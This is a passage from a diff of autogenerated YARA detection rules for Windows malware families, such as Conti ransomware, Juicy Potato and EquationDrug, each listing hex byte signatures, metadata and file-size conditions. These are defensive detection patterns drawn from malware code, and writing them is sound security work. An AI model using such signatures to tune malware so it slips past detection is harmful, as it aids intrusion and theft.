+		$sequence_2 = { 89442428 ff742420 8b6c2418 58 894500 ff742424 58 }
+		$sequence_3 = { 740d 50 51 e8???????? 83c408 c20800 }
+		$sequence_4 = { ff05???????? 8934c558344100 890cc55c344100 5e c20800 55 8bec }
+		$sequence_5 = { 8bf0 e8???????? 33ff 3bc7 740a 893e 897e04 }
+		$sequence_6 = { 897e1c 3bc5 0f8490000000 8b4804 894e10 8b480c 894e18 }
+		$sequence_7 = { c21000 8b442408 48 7404 33c0 eb15 8b442404 }
+		$sequence_8 = { 58 a3???????? ff7508 58 }
+		$sequence_9 = { 6a08 ff35???????? ff15???????? 8bf0 33db 3bf3 }
 
 	condition:
-		7 of them and filesize < 393216
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Conti_Auto : FILE
+rule MALPEDIA_Win_Biscuit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "495a4961-c51d-5437-b6e5-42c5ef6dadea"
+		id = "4b580404-4186-5ded-b852-ff8cc2d91924"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.conti"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.conti_auto.yar#L1-L249"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.biscuit_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "8e7e21e9b7d082151509bf910013dc897955e4fc02be809b33bd86909bb72949"
+		logic_hash = "21658c2822d8c2da349d55326a2fbe01a4e5603d4a188c5f0ab05c786709117d"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -111794,48 +111887,32 @@ rule MALPEDIA_Win_Conti_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7542 53 bb0e000000 57 8d7e01 8d7371 }
-		$sequence_1 = { 56 8bf1 8975fc 803e00 7542 53 bb0e000000 }
-		$sequence_2 = { 8d7f01 0fb6c0 b957000000 2bc8 }
-		$sequence_3 = { 0f1f4000 8a07 8d7f01 0fb6c0 b966000000 2bc8 }
-		$sequence_4 = { 8d7f01 0fb6c0 b927000000 2bc8 }
-		$sequence_5 = { 8d7f01 0fb6c0 b978000000 2bc8 }
-		$sequence_6 = { 56 57 bf0e000000 8d7101 }
-		$sequence_7 = { 8d7f01 0fb6c0 b918000000 2bc8 }
-		$sequence_8 = { ff75fc ff15???????? e9???????? 6800800000 }
-		$sequence_9 = { 57 56 ff15???????? ff75f8 56 ff15???????? }
-		$sequence_10 = { 7605 b800005000 6a00 8d4c2418 }
-		$sequence_11 = { ffd0 85c0 7519 c705????????0a000000 e9???????? b801000000 e9???????? }
-		$sequence_12 = { 6810660000 ff7508 ff15???????? 85c0 }
-		$sequence_13 = { e8???????? 8bb6007d0000 85f6 75ef }
-		$sequence_14 = { ff75f8 ff15???????? 85c0 7508 6a01 ff15???????? 6aff }
-		$sequence_15 = { 7411 a801 740d 83f001 50 ff7608 ff15???????? }
-		$sequence_16 = { 53 56 8bf1 57 ff7608 ff15???????? }
-		$sequence_17 = { 3ce9 7412 3cff 0f859d000000 807f0125 0f8593000000 }
-		$sequence_18 = { 85c0 742b 03f0 03d8 }
-		$sequence_19 = { 41b901000000 4533c0 488bd3 488bce }
-		$sequence_20 = { 410f4ff5 488bcb 448bc6 ffd0 }
-		$sequence_21 = { 49f7e8 4903d0 48c1fa06 488bca 48c1e93f 4803d1 488d3c92 }
-		$sequence_22 = { 72c3 488b7c2448 b801000000 488b742440 4883c430 }
-		$sequence_23 = { ffd0 4c3beb 740f 4c3bfb 740a 4c3bf3 }
-		$sequence_24 = { 4833c4 4889442438 4533e4 418be8 4489642430 4c8bfa 4c8bf1 }
-		$sequence_25 = { 8b4c2430 8b05???????? 03c7 03c8 894c2430 8b442430 }
+		$sequence_0 = { c6040800 8b4c241c 5f c745300030c084 8bc5 5e }
+		$sequence_1 = { 8b95b8b7ffff 52 e8???????? 83c404 eb22 8b85d4daffff 83e801 }
+		$sequence_2 = { 8d8dd0daffff 51 b9???????? e8???????? 25ff000000 85c0 }
+		$sequence_3 = { eb1f 8b45f0 83e801 898584b6ffff 8b8d84b6ffff 8a11 }
+		$sequence_4 = { 8b8d74b7ffff 3b4de0 0f83f5000000 8b55e0 2b9574b7ffff 899588b7ffff 8b857cb7ffff }
+		$sequence_5 = { 83bd28ffffff00 7502 eb71 8b8528ffffff 33c9 }
+		$sequence_6 = { 03f0 03d8 3bb42458100000 734f 6800100000 8d442444 53 }
+		$sequence_7 = { 8d8da0daffff e8???????? 8d9510b9ffff 52 b9???????? e8???????? }
+		$sequence_8 = { 8b8db0feffff 51 e8???????? 83c404 eb1f 8b55e4 83ea01 }
+		$sequence_9 = { 83e901 898d34feffff 8b9534feffff 8a02 2c01 8b8d34feffff }
 
 	condition:
-		7 of them and filesize < 520192
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Unidentified_045_Auto : FILE
+rule MALPEDIA_Win_Juicy_Potato_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7710c8cf-a592-5c63-bf57-74d2e907d9db"
+		id = "874d6ec6-fd0c-5bd7-9c40-0556815f8763"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_045_auto.yar#L1-L98"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.juicy_potato_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "2c83bad8d9cfd5aadbf00585cf334eb826afab5840caeb0b4d10dd25220749b4"
+		logic_hash = "1027b6a0329ebee66fff8afc52e7ac6bf20b1db9537e47f298642e3fe872d860"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111849,30 +111926,32 @@ rule MALPEDIA_Win_Unidentified_045_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6800040000 53 53 681f000f00 50 }
-		$sequence_1 = { 83e70f 5b 83ff03 7205 83ff08 }
-		$sequence_2 = { 33db 6a68 8d45b8 53 50 895d70 }
-		$sequence_3 = { 7517 ff7638 8b4810 e8???????? }
-		$sequence_4 = { ff7510 8d45f0 56 6a0c 50 }
-		$sequence_5 = { ff7508 897dac 56 ff15???????? }
-		$sequence_6 = { 8901 8b8538ffffff 8b0d???????? 8901 }
-		$sequence_7 = { 03f0 0500040000 894508 8d8ef8000000 3bc8 0f87d6030000 b850450000 }
+		$sequence_0 = { 0f8521ffffff 44882b eb7b 488b9540070000 4c8d05d7b20200 }
+		$sequence_1 = { e8???????? 488d1548380300 488d4c2420 e8???????? cc 488d4c2420 e8???????? }
+		$sequence_2 = { 0fb7d0 488d8de0000000 81ca00000780 85c0 0f4ed0 e8???????? 488d15a8350200 }
+		$sequence_3 = { 488d054ab1ffff 4889442438 488d4c2428 e8???????? }
+		$sequence_4 = { e8???????? eb98 488d4c2420 e8???????? 488d15fee90200 488d4c2420 }
+		$sequence_5 = { 4889442430 8b442478 89442428 488b442470 4c8b11 4889442420 }
+		$sequence_6 = { 488901 488d05660b0100 48894110 f6c201 740a ba90000000 e8???????? }
+		$sequence_7 = { 4885c0 7509 488d056f200400 eb04 4883c024 8938 e8???????? }
+		$sequence_8 = { 4883ec20 488bd9 488bc2 488d0d9dc10000 48890b }
+		$sequence_9 = { 44016f6c 48875308 4c396b08 7521 8364242800 488d0560acfeff 4889442430 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 736256
 }
-rule MALPEDIA_Win_Hui_Loader_Auto : FILE
+rule MALPEDIA_Win_Mim221_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9d52a9e1-364f-5da9-98e9-94947c68e8f2"
+		id = "228071fb-1a03-5df1-9306-75e661d4eff3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hui_loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hui_loader_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mim221"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mim221_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "9aeecb9fd394041a8c28b780fedfdb6f106e3cf0d7d8dbc8dc34058d911e30dc"
+		logic_hash = "fbcd019f6c67a46486f2c63b4d67a0947f9feb6ff08f1d935eac4f65f1ebad93"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111886,32 +111965,32 @@ rule MALPEDIA_Win_Hui_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc8 83e01f c1f905 56 57 8b348d60e20010 }
-		$sequence_1 = { 83c028 83c12c 4a 75eb b902000000 8d742454 83f901 }
-		$sequence_2 = { 8db604b40010 6a00 50 ff36 e8???????? }
-		$sequence_3 = { 75f8 42 83c628 83fa0a 7ce6 b931000000 33c0 }
-		$sequence_4 = { 68???????? ff15???????? 6a00 6a00 6a00 8bf0 6a04 }
-		$sequence_5 = { 80f95c 7408 8a48ff 48 3acb 75f3 }
-		$sequence_6 = { 56 ff15???????? 8bf8 85ff 7506 50 }
-		$sequence_7 = { 6880000000 6a03 53 6a02 6800000080 68???????? }
-		$sequence_8 = { ffd0 68e8030000 ffd6 8b0d???????? }
-		$sequence_9 = { 6a03 53 6a02 6800000080 68???????? ff15???????? }
+		$sequence_0 = { 488d0d77ec0100 e8???????? 488bf0 483bc5 7507 33c0 e9???????? }
+		$sequence_1 = { 66c785cc0000007800 66c785ce0000006300 66c785d00000006500 66c785d20000007000 66c785d40000007400 66c785d60000006900 66c785d80000006f00 }
+		$sequence_2 = { 48894108 488b442440 488b4808 4885c9 740f ff15???????? 488b4c2440 }
+		$sequence_3 = { 33d2 488d42ff 48f7f1 4883f801 733b 48c78424b800000000000000 488d9424b8000000 }
+		$sequence_4 = { 49c743a80f000000 49c743a000000000 c644247800 33c0 488d48ff 488d7c2460 f2ae }
+		$sequence_5 = { e8???????? 90 488d4c2450 e8???????? 90 488d054c2b0100 4889442450 }
+		$sequence_6 = { c78424c0000000d8000000 89ac24c4000000 89b424c8000000 48c78424d000000020010000 89bc24d8000000 48c78424e000000018000000 44899c24e8000000 }
+		$sequence_7 = { 4883f8ff 488be8 0f84ae000000 488d9424c0000000 488bc8 c78424c000000038020000 e8???????? }
+		$sequence_8 = { 6644897c2450 66c74424526400 66c74424545d00 66897c2456 }
+		$sequence_9 = { 7505 498bd1 eb21 498b5108 41386849 7504 49895008 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 471040
 }
-rule MALPEDIA_Win_Portdoor_Auto : FILE
+rule MALPEDIA_Win_Cryptoshuffler_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e4b852ed-5498-5523-835d-78e52c259853"
+		id = "998eec42-f040-507e-9bef-931d28600d2d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.portdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.portdoor_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cryptoshuffler_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "7da9aa8b4f7f6857e35f1211f6a60eddf3c94eedff73ea09aab294e2b6809d65"
+		logic_hash = "2eb7cd664cf23b0f4478f6fc772120b42235dfe3815c8e843a34a2664a62760c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111925,34 +112004,34 @@ rule MALPEDIA_Win_Portdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 884dff eb4e 8808 46 40 eb48 80f909 }
-		$sequence_1 = { e8???????? 6a5c 58 6a2a 668945f0 }
-		$sequence_2 = { 50 a3???????? e8???????? 83c410 8b4dfc 33cd 5e }
-		$sequence_3 = { ff75e8 ff15???????? 6828020000 8d85c0fdffff }
-		$sequence_4 = { 6a64 5a ffb57cf7ffff 668945e0 }
-		$sequence_5 = { 8b0485b80f0210 f644010440 7409 803a1a 7504 33c0 eb1c }
-		$sequence_6 = { 59 85c0 0f84da000000 8b4704 8bce 8b7708 c1e102 }
-		$sequence_7 = { 807e0400 0f8564ffffff eb0c ff36 ff15???????? c6460400 5f }
-		$sequence_8 = { 85ff 7450 8d4701 50 }
-		$sequence_9 = { e8???????? a1???????? 33c5 8945fc 53 8b5d08 8d85fdfbffff }
+		$sequence_0 = { 660f282d???????? 660f59f5 660f28aa20a50210 660f54e5 660f58fe }
+		$sequence_1 = { 8d0486 894304 5f 8933 }
+		$sequence_2 = { f6c11f 0f85ad040000 8b41fc 3bc1 0f83a2040000 }
+		$sequence_3 = { 83f85b 757d 8b06 8b4e08 3bc1 }
+		$sequence_4 = { 837e4c29 8ad8 0f85fd000000 8b06 8b4e08 3bc1 }
+		$sequence_5 = { c7401c00000000 c7402000000000 8906 894604 8b4508 89460c 8bc6 }
+		$sequence_6 = { 8b4508 83c020 50 ff15???????? 5d c3 6a0a }
+		$sequence_7 = { e8???????? 8bce e8???????? 837e4cff b101 0f8555fcffff }
+		$sequence_8 = { 8d45b4 89458c 8d458c 51 50 51 e8???????? }
+		$sequence_9 = { 6685c0 0f84e7000000 6a00 8d4e24 }
 
 	condition:
-		7 of them and filesize < 297984
+		7 of them and filesize < 425984
 }
-rule MALPEDIA_Win_Maktub_Auto : FILE
+rule MALPEDIA_Win_Equationdrug_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ecc73f32-ecbd-5318-a556-c2b45ed34c44"
+		id = "0821a935-fb15-5c3e-bb02-07988e07b501"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.maktub_auto.yar#L1-L197"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.equationdrug_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "ff16c7a452af8c5ebf57513ce479bd7fbd7433b4ce2d8fbd914a83844ba9c640"
+		logic_hash = "33511eccd2ca8c4746b8fc7fbb9655df57173691c00d0c7d16e68bf416563316"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -111964,45 +112043,34 @@ rule MALPEDIA_Win_Maktub_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd0 f7d8 1bc0 f7d8 8be5 }
-		$sequence_1 = { ff15???????? eb0a 57 6a08 }
-		$sequence_2 = { ff15???????? eb02 33c0 46 }
-		$sequence_3 = { ff15???????? eb02 33db 8b4df4 }
-		$sequence_4 = { ff15???????? e9???????? 8d43f4 3d???????? 0f84c1000000 833d????????00 }
-		$sequence_5 = { e8???????? 8b75fc 8b4df0 83c305 8a4513 }
-		$sequence_6 = { ff15???????? f6c301 0f8414010000 8d46fc }
-		$sequence_7 = { ff30 e8???????? 8bc7 5f 5e 5b }
-		$sequence_8 = { 8bf8 c785d4fdffff2c020000 8d85d4fdffff 50 57 68???????? }
-		$sequence_9 = { 8d4f14 8b18 8b7004 8d45e8 }
-		$sequence_10 = { 8bf8 8d442428 6a50 50 897c2424 }
-		$sequence_11 = { 8d4f2c e8???????? 84c0 7578 }
-		$sequence_12 = { 8bf8 c744242000000000 f7642424 8bcf 0fafcd 8bd8 8b44241c }
-		$sequence_13 = { 8bf8 8b4c242c 03f2 03710c }
-		$sequence_14 = { 8d4f20 e8???????? 84c0 750f }
-		$sequence_15 = { 8d4f10 e8???????? 8d4f30 8b30 8b5004 8d45f0 }
-		$sequence_16 = { 8d4f34 e8???????? 8d4f14 8b18 }
-		$sequence_17 = { 8bf8 8db508040000 b917000000 53 }
-		$sequence_18 = { 8d4f28 89471c 33c0 c6472000 }
-		$sequence_19 = { 8bf8 897dec 33db 66895f0c 895dfc 8b450c }
-		$sequence_20 = { 8d4f30 e8???????? 8b470c 8d4d10 }
+		$sequence_0 = { 751f 668b5c241c 66395c240c 7420 8d4c240c 46 51 }
+		$sequence_1 = { 8b4604 50 e8???????? 8b542430 8b4c2434 83c404 8d048a }
+		$sequence_2 = { 50 e8???????? 83c404 84c0 7507 b812060000 5e }
+		$sequence_3 = { 89742468 e8???????? 6a40 899c24bc030000 e8???????? 83c404 89442440 }
+		$sequence_4 = { 8b4618 50 8944240c e8???????? 33ff 897e18 897e1c }
+		$sequence_5 = { 8bc5 5e 5d 5b 81c498000000 c3 5f }
+		$sequence_6 = { 0f8578010000 8b9424f8000000 83c9ff 8bfa f2ae f7d1 51 }
+		$sequence_7 = { 85c0 66a5 7409 50 e8???????? 83c404 8b4c2418 }
+		$sequence_8 = { 5f 8930 5e 8919 5d 33c0 5b }
+		$sequence_9 = { 8b4c2414 83c408 897e08 897e0c 897e10 5f 5e }
 
 	condition:
-		7 of them and filesize < 3063808
+		7 of them and filesize < 449536
 }
-rule MALPEDIA_Win_Prikormka_Auto : FILE
+rule MALPEDIA_Win_Bravonc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2d17b792-a768-56ab-af11-e8fba342d1c6"
+		id = "6dc4fda1-21f0-5df6-853f-1dcbad03c148"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.prikormka_auto.yar#L1-L417"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bravonc_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "ca50544df2308cc151f303c9210769038ba6545078bcd4dca147dd52915255ab"
+		logic_hash = "773a75cc27f4f0e2a9753a7f457b50e9ee585cad286c778ed87544df88619b9a"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -112014,70 +112082,34 @@ rule MALPEDIA_Win_Prikormka_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d0446 50 e8???????? 83c40c 6a00 56 }
-		$sequence_1 = { 6a00 56 ffd3 8b2d???????? 85c0 7405 }
-		$sequence_2 = { 8d1446 52 e8???????? 83c40c }
-		$sequence_3 = { 6800020000 ff15???????? 68???????? ffd7 03c0 50 68???????? }
-		$sequence_4 = { 51 e8???????? 83c40c 68???????? ffd7 }
-		$sequence_5 = { 85f6 7420 68???????? ffd7 }
-		$sequence_6 = { 6a00 56 ffd3 85c0 7405 6a02 56 }
-		$sequence_7 = { 740e 68???????? 50 ff15???????? ffd0 }
-		$sequence_8 = { 7408 41 42 3bce }
-		$sequence_9 = { 83c40c 8d442404 50 ff15???????? 5e 85c0 }
-		$sequence_10 = { 59 c3 50 ff15???????? b801000000 }
-		$sequence_11 = { 6a00 6a00 ff15???????? 85c0 7502 59 c3 }
-		$sequence_12 = { 0fb7c0 6683f805 7d09 b801000000 }
-		$sequence_13 = { c3 57 6a00 6a00 6a00 6a02 }
-		$sequence_14 = { 68???????? ff15???????? 0fb7c0 6683f805 }
-		$sequence_15 = { ff15???????? ffd0 c705????????01000000 c705????????01000000 }
-		$sequence_16 = { 5e 85c0 7422 68???????? 50 }
-		$sequence_17 = { 5e 85c0 7414 c705????????01000000 }
-		$sequence_18 = { 33f6 e8???????? e8???????? e8???????? e8???????? e8???????? e8???????? }
-		$sequence_19 = { 6685d2 75f5 2bce 8d1400 52 d1f9 }
-		$sequence_20 = { 8bf0 ff15???????? 3db7000000 751f }
-		$sequence_21 = { 50 e8???????? 8b2d???????? 83c40c 6a00 }
-		$sequence_22 = { 3db7000000 751f 56 ff15???????? 33c0 }
-		$sequence_23 = { 668b08 83c002 6685c9 75f5 8b0d???????? 2bc2 8b15???????? }
-		$sequence_24 = { d1f8 8d7102 8da42400000000 668b11 83c102 6685d2 }
-		$sequence_25 = { e8???????? 8b35???????? 83c40c 68???????? ffd6 03c0 }
-		$sequence_26 = { 50 e8???????? b8???????? 83c40c 8d5002 }
-		$sequence_27 = { 6685c9 75f5 8d0c12 2bc6 51 d1f8 8d544408 }
-		$sequence_28 = { 75f5 2bc6 8d0c12 51 d1f8 }
-		$sequence_29 = { 85c0 7409 6a02 68???????? }
-		$sequence_30 = { 52 0fb754241c 50 0fb7442422 }
-		$sequence_31 = { e8???????? 83c40c eb0d 6a00 6800020000 ff15???????? }
-		$sequence_32 = { 68???????? 33ff 57 57 ff15???????? 8bf0 }
-		$sequence_33 = { 68???????? ffd6 50 68???????? 57 ffd6 03c7 }
-		$sequence_34 = { 75f5 2bc2 b9???????? d1f8 8d7102 668b11 }
-		$sequence_35 = { 83c002 6685c9 75f5 2bc6 03d2 52 }
-		$sequence_36 = { 6685d2 75f5 8d1400 2bce 52 d1f9 }
-		$sequence_37 = { d1f8 8bd0 b8???????? 8d7002 }
-		$sequence_38 = { b8???????? 8d7002 8da42400000000 668b08 83c002 }
-		$sequence_39 = { 8b1d???????? 83c40c 6a00 68???????? }
-		$sequence_40 = { 50 e8???????? b9???????? 83c40c 8d5102 668b01 }
-		$sequence_41 = { c20400 6a0c b8???????? e8???????? 33c0 8945ec }
-		$sequence_42 = { 6a00 8d45f8 50 8d34fd0cde0110 ff36 e8???????? }
-		$sequence_43 = { 50 43 6a02 43 }
-		$sequence_44 = { 8d4514 50 e8???????? 53 8d4d00 }
-		$sequence_45 = { 3bfb 7d12 8b4de4 53 }
+		$sequence_0 = { 8b4838 334820 334818 33480c }
+		$sequence_1 = { 68???????? e8???????? e8???????? be???????? 68???????? 56 c705????????03000000 }
+		$sequence_2 = { 8bce e8???????? eb03 8b7d08 8b1d???????? 8d45f4 }
+		$sequence_3 = { 33480c 334804 51 e8???????? 8b8ec0000000 53 ff75f0 }
+		$sequence_4 = { 334dec 57 ff75fc 334dfc }
+		$sequence_5 = { 5e c9 c20c00 55 8bec 81ec80020000 53 }
+		$sequence_6 = { 57 8bce ff15???????? 8bc6 5f 5e c9 }
+		$sequence_7 = { 8945f4 8b06 f7d8 23c1 03f3 8945fc }
+		$sequence_8 = { 334834 6a01 334828 334814 51 }
+		$sequence_9 = { eb02 33db 6a01 e8???????? 84c0 59 750d }
 
 	condition:
-		7 of them and filesize < 401408
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Safenet_Auto : FILE
+rule MALPEDIA_Win_Infy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f291e692-0cf7-535f-829f-d3eb37065334"
+		id = "3e52df24-aedf-51dc-878e-bd87d1c8f8c2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.safenet"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.safenet_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.infy_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "8771350f205428c4c7fbcedc7de0eba58fbdfc684579398209f093f9a759ec1a"
-		score = 75
-		quality = 75
+		logic_hash = "66e1e03eb3c288253d677feb2572d3dd19031bc03f792127c5e2fe93ef218916"
+		score = 60
+		quality = 45
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -112089,32 +112121,32 @@ rule MALPEDIA_Win_Safenet_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4db4 50 c645fc01 e8???????? 8b4d08 }
-		$sequence_1 = { ff15???????? eb5a ff75fc ff15???????? }
-		$sequence_2 = { 8b45fc 3bc3 7504 c6461401 }
-		$sequence_3 = { 51 8d8d7cffffff ff7634 51 50 ffd3 85c0 }
-		$sequence_4 = { 68???????? 57 ff15???????? 3bc6 7505 83ceff }
-		$sequence_5 = { 3b1d???????? 0f8315010000 8bc3 8bcb c1f805 83e11f 8b048540174100 }
-		$sequence_6 = { 50 ff7638 57 ff7618 ff55f8 }
-		$sequence_7 = { 8d34b5d0d84000 83c00c 3bc6 7305 395004 }
-		$sequence_8 = { ff750c e8???????? ff75ec e8???????? ff75e8 e8???????? }
-		$sequence_9 = { c745bc3c000000 c745c040040000 ff15???????? 8945c4 8d85b4fdffff 8945cc }
+		$sequence_0 = { 85ff 7e2e 4e 8bd0 }
+		$sequence_1 = { 33d2 e8???????? eb2d 3b7df8 7514 8b45f0 }
+		$sequence_2 = { 740e 8d45d0 50 6a03 ff15???????? 8bd8 85db }
+		$sequence_3 = { 50 89c6 8b449d04 85c0 7412 }
+		$sequence_4 = { 837dec00 740b 8b45f0 8b55f8 }
+		$sequence_5 = { 833d????????00 740e 8d55d0 52 6a01 }
+		$sequence_6 = { b8???????? e8???????? b8???????? e8???????? 807b2800 7514 }
+		$sequence_7 = { 85f6 7d04 33ff eb0a 8bf8 2bfb }
+		$sequence_8 = { 7502 eb06 8b1b 85db }
+		$sequence_9 = { 0fb74af4 870c24 51 8b4afc e9???????? }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Avrecon_Auto : FILE
+rule MALPEDIA_Win_Acridrain_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e925dd84-abb8-59f0-bccd-32907a99e474"
+		id = "ef433885-2f79-5863-bbed-81d7d31ae677"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avrecon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.avrecon_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.acridrain_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "765f86e5cde1b429c99a3eaacfdc82ca40acf684e216c378122ba2b0c85c22ec"
+		logic_hash = "be1111fbfc299034daf1631180c40c75225491471e67ad1cf19bc33316287e9b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112128,32 +112160,32 @@ rule MALPEDIA_Win_Avrecon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a24 8d4554 50 e8???????? }
-		$sequence_1 = { 8d45f8 50 53 ff75ec c745f801000000 ffd7 83f8ff }
-		$sequence_2 = { 83791c01 7511 6a00 8d4514 50 56 57 }
-		$sequence_3 = { 8d4401fc c7457401000000 894570 8d7c1f04 837d7000 }
-		$sequence_4 = { 807d7301 7508 e8???????? 885d73 8d85a8f3ffff 50 }
-		$sequence_5 = { 8d85a8f7ffff 50 c7454000040000 ff15???????? }
-		$sequence_6 = { 51 894d30 33c0 8d8d18feffff 40 51 50 }
-		$sequence_7 = { 50 bb7f660440 53 ff7508 c745f801000000 ffd7 83f8ff }
-		$sequence_8 = { 50 e8???????? 85c0 7466 6a0e 68???????? }
-		$sequence_9 = { 83650800 b8e8030000 660105???????? 0fb705???????? 50 ffd6 668945de }
+		$sequence_0 = { ff8ea0000000 8bf8 897df0 83ff64 741e 83bb8400000000 7c15 }
+		$sequence_1 = { ff7048 e8???????? 83c404 85f6 0f85c4000000 8b4dec 8bc7 }
+		$sequence_2 = { f6401604 57 8b7a38 7414 8b45f0 51 03c7 }
+		$sequence_3 = { f20f5945d4 f20f5905???????? e9???????? 81fe56010000 7c2a 8bcf e8???????? }
+		$sequence_4 = { e8???????? 33c9 0fb6db 83c408 84c0 0f45d9 895c2414 }
